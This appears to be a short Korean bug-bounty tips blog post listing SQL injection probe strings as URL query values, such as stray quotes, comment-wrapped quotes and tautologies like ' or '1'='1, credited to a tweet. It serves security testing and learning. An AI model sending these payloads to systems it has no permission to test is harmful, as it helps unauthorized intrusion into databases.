본문 바로가기

참치공장/Bug bounty Tips

SQL Injection

반응형

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd''   <== concat string

 

/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()

 

source : https://twitter.com/TodayCyberNews/status/1486145250728955906

반응형

'참치공장 > Bug bounty Tips' 카테고리의 다른 글

XSS  (0) 2022.01.26